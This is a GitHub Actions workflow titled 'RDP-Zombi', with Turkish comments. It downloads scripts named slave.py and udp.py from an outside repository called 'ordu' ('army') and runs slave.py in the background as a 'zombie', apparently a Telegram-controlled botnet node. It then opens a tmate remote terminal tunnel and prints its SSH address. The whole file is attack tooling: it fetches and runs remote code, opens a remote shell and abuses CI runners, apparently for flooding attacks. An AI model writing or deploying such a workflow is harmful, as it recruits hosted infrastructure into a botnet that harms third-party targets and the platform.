name: RDP-Zombi
on: [workflow_dispatch]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Zombiyi ve RDP'yi Yukle
        run: |
          # Önce zombiyi arkada başlatıyoruz
          pip install pyTelegramBotAPI
          wget -q -O slave.py https://raw.githubusercontent.com/HAYALETBEY437/ordu/main/slave.py
          wget -q -O udp.py https://raw.githubusercontent.com/HAYALETBEY437/ordu/main/udp.py
          python3 slave.py &
          
          # Şimdi RDP/Terminal tünelini kuruyoruz
          sudo apt update && sudo apt install -y tmate
          tmate -S /tmp/tmate.sock new-session -d
          tmate -S /tmp/tmate.sock wait tmate
          tmate -S /tmp/tmate.sock display -p '#{tmate_ssh}'
